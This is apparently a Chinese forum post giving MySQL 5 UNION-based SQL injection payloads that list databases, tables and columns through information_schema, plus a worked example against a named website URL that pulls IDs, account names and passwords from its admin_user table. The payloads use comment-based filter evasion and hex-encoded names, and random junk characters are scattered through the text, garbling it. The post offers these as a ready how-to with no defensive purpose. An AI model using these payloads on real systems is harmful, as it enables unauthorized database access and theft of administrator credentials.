查库
- v I8 j0 l h5 H- Z( Q( M# j7 }0 v! Y8 D2 _
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*5 [ f, a* N* f) \% o' m4 {
2 u7 \5 H/ g6 n$ C0 U: ^
查表' D! e3 b) w1 f. J) O
8 U4 r' j+ C0 o! C1 R% h
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
& d4 H. @* V* a7 F; D9 @/ T* T
查段
3 Y: z! z8 \& ^' k
7 ]6 I# z1 e! ]. fid=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
2 r' u9 t& k; V. ~( A- N
0 ~( G% A2 K/ m4 Z- V) ?$ ` H% M, v& H$ ?4 K" k7 D+ J+ c
mysql5高级注入方法暴表
: T* D" E, `4 x: J& h. ?$ v3 \
- P' h. c5 S7 u3 }( ^% W例子如下:
2 A' K- i) V7 [+ ?- a
+ d) Z% H# s9 y* i2 v1.爆表
; m% _/ _+ ]# e$ y B' Nhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
8 u9 D: y! ?7 x" G这样爆到第4个时出现了admin_user表。+ k+ C) B1 G m/ g4 ]
- ~: o8 O X% b' f2.暴字段
5 [- [$ L1 l2 L# l) Q2 l! E7 Ohttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*1 y0 y# Z9 S! u9 s6 {+ y
, p% I1 _. N1 J" N8 U
i) _- l' T& F" p3.爆密码
" W7 T3 i- J# a; Ihttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/* * [3 O% {2 ]' H" K( Q
7 `8 X# U5 Z( M" T* i( l5 t
& X3 P! b6 T T
|
发表于 2012-9-13 16:29:37
收藏
支持
反对